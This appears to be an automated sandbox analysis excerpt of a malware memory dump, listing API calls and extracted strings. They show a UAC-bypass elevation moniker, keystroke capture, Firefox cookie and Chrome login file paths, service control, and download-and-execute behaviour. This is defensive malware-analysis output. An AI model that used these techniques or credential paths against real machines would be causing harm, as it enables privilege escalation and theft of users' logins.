                      • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                      APIs
                      • _wcslen.LIBCMT ref: 00407521
                      • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Object_wcslen
                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • API String ID: 240030777-3166923314
                      • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                      • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                      • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                      • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                      APIs
                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                      • GetLastError.KERNEL32 ref: 0041A7BB
                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                      • String ID:
                      • API String ID: 3587775597-0
                      • Opcode ID: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
                      • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                      • Opcode Fuzzy Hash: 6acfec477c33960adb53ca531a04b71f608e95b4af76d4dccda85eb8d0b50c1e
                      • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                      • FindClose.KERNEL32(00000000), ref: 0040C47D
                      • FindClose.KERNEL32(00000000), ref: 0040C4A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$CloseFile$FirstNext
                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                      • API String ID: 1164774033-405221262
                      • Opcode ID: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
                      • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                      • Opcode Fuzzy Hash: 66fe6d6053e6612d2a3ee79fceeb28f858ac6dc921cc8d7f836653099c7867af
                      • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                      • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                      • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                      • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                      • String ID:
                      • API String ID: 2341273852-0
                      • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                      • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                      • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                      • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Find$CreateFirstNext
                      • String ID: 8SG$PXG$PXG$NG$PG
                      • API String ID: 341183262-3812160132
                      • Opcode ID: 470ab8da4902ff5f28a90d4a204bebebba49c99aad5ddac86b39027323f8a7a0
                      • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                      • Opcode Fuzzy Hash: 470ab8da4902ff5f28a90d4a204bebebba49c99aad5ddac86b39027323f8a7a0
                      • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                      APIs
                      • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                      • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                      • GetKeyState.USER32(00000010), ref: 0040A433
                      • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                      • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                      • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                      • String ID:
                      • API String ID: 1888522110-0
                      • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                      • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                      • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                      • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                      APIs
                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                      • GetProcAddress.KERNEL32(00000000), ref: 00414271
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressCloseCreateLibraryLoadProcsend
                      • String ID: SHDeleteKeyW$Shlwapi.dll
                      • API String ID: 2127411465-314212984
                      • Opcode ID: 8d767b2494838fac2749ef1aaaad240b247c65203226e5c7e0d1ba9f7cfccb50
                      • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                      • Opcode Fuzzy Hash: 8d767b2494838fac2749ef1aaaad240b247c65203226e5c7e0d1ba9f7cfccb50
                      • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                      APIs
                        • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                        • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                        • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                        • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                        • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                      • GetProcAddress.KERNEL32(00000000), ref: 00416872
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                      • String ID: !D@$PowrProf.dll$SetSuspendState
                      • API String ID: 1589313981-2876530381
                      • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                      • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                      • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                      • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                      APIs
                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                      • GetLastError.KERNEL32 ref: 0040BA58
                      Strings
                      • UserProfile, xrefs: 0040BA1E
                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                      • [Chrome StoredLogins not found], xrefs: 0040BA72
                      • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteErrorFileLast
                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • API String ID: 2018770650-1062637481
                      • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                      • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                      • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                      • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                      APIs
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                      • GetLastError.KERNEL32 ref: 0041799D
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                      • String ID: SeShutdownPrivilege
                      • API String ID: 3534403312-3733053543
                      • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                      • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                      • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                      • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                      • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                      • Opcode Fuzzy Hash: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                      • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                      APIs
                      • __EH_prolog.LIBCMT ref: 00409258
                        • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00F86D08,00000010), ref: 004048E0
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                      • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                      • FindClose.KERNEL32(00000000), ref: 004093C1
                        • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                        • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                        • Part of subcall function 00404E26: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                      • FindClose.KERNEL32(00000000), ref: 004095B9
                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                      • String ID:
                      • API String ID: 2435342581-0
                      • Opcode ID: 6cad6af0f329120c81c925ac196a2686bd147d6e8b43e11fbd3a5bfa6db4d0ce
                      • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                      • Opcode Fuzzy Hash: 6cad6af0f329120c81c925ac196a2686bd147d6e8b43e11fbd3a5bfa6db4d0ce
                      • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ManagerStart
                      • String ID:
                      • API String ID: 276877138-0
                      • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                      • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                      • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                      • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                      APIs
                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004524D5
                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004524FE
                      • GetACP.KERNEL32 ref: 00452513
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID: ACP$OCP
                      • API String ID: 2299586839-711371036
                      • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                      • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                      • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                      • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                      APIs
                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                      • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                      • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                      • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID: SETTINGS
                      • API String ID: 3473537107-594951305
                      • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                      • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                      • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                      • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                      APIs
                      • __EH_prolog.LIBCMT ref: 0040966A
                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstH_prologNext
                      • String ID:
                      • API String ID: 1157919129-0
                      • Opcode ID: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                      • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                      • Opcode Fuzzy Hash: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                      • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                      APIs
                        • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                      • GetUserDefaultLCID.KERNEL32 ref: 0045271C
                      • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                      • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004527ED
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                      • String ID:
                      • API String ID: 745075371-0
                      • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                      • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                      • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                      • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                      APIs
                      • __EH_prolog.LIBCMT ref: 00408811
                      • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                      • String ID:
                      • API String ID: 1771804793-0
                      • Opcode ID: 9a638f232f7986981f55bddf65949b622a13160512e68c16031e1c55a9115e6e
                      • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                      • Opcode Fuzzy Hash: 9a638f232f7986981f55bddf65949b622a13160512e68c16031e1c55a9115e6e
                      • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                      APIs
                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
